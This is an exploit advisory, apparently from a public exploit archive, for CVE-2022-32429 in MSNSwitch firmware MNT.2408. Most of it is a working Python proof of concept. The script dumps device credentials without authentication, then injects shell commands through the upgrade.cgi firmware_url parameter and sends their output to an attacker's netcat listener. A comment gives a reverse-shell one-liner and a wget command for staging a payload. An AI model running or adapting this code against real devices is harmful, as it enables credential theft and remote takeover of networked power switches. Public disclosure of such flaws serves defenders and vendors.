MSNSwitch Firmware MNT.2408 Remote Code Execution

2022.11.12
Credit: Eli Fulkerson
Risk: High
Local: No
Remote: Yes
CWE: N/A

Exploit Title: MSNSwitch Firmware MNT.2408 - Remote Code Exectuion (RCE) Google Dork: n/a Date:9/1/2022 Exploit Author: Eli Fulkerson Vendor Homepage: https://www.msnswitch.com/ Version: MNT.2408 Tested on: MNT.2408 firmware CVE: CVE-2022-32429 #!/usr/bin/python3 """ POC for unauthenticated configuration dump, authenticated RCE on msnswitch firmware 2408. Configuration dump only requires HTTP access. Full RCE requires you to be on the same subnet as the device. """ import requests import sys import urllib.parse import readline import random import string # listen with "ncat -lk {LISTENER_PORT}" on LISTENER_HOST LISTENER_HOST = "192.168.EDIT.ME" LISTENER_PORT = 3434 # target msnswitch TARGET="192.168.EDIT.ME2" PORT=80 USERNAME = None PASSWORD = None """ First vulnerability, unauthenticated configuration/credential dump """ if USERNAME == None or PASSWORD == None: # lets just ask hack_url=f"http://{TARGET}:{PORT}/cgi-bin-hax/ExportSettings.sh" session = requests.session() data = session.get(hack_url) for each in data.text.split('\n'): key = None val = None try: key = each.strip().split('=')[0] val = each.strip().split('=')[1] except: pass if key == "Account1": USERNAME = val if key == "Password1": PASSWORD = val """ Second vulnerability, authenticated command execution This only works on the local lan. for full reverse shell, modify and upload netcat busybox shell script to /tmp: shell script: rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.X.X 4242 >/tmp/f download to unit: /usr/bin/wget http://192.168.X.X:8000/myfile.txt -P /tmp ref: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#netcat-busybox """ session = requests.session() # initial login, establishes our Cookie burp0_url = f"http://{TARGET}:{PORT}/goform/login" burp0_headers = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "Origin": f"http://{TARGET}", "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Referer": "http://192.168.120.17/login.asp", "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US,en;q=0.9", "Connection": "close"} burp0_data = {"login": "1", "user": USERNAME, "password": PASSWORD} session.post(burp0_url, headers=burp0_headers, data=burp0_data) # get our csrftoken burp0_url = f"http://{TARGET}:{PORT}/saveUpgrade.asp" data = session.get(burp0_url) csrftoken = data.text.split("?csrftoken=")[1].split("\"")[0] while True: CMD = input('x:') CMD_u = urllib.parse.quote_plus(CMD) filename = ''.join(random.choice(string.ascii_letters) for _ in range(25)) try: hack_url = f"http://{TARGET}:{PORT}/cgi-bin/upgrade.cgi?firmware_url=http%3A%2F%2F192.168.2.1%60{CMD_u}%7Cnc%20{LISTENER_HOST}%20{LISTENER_PORT}%60%2F{filename}%3F&csrftoken={csrftoken}" session.get(hack_url, timeout=0.01) except requests.exceptions.ReadTimeout: pass


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top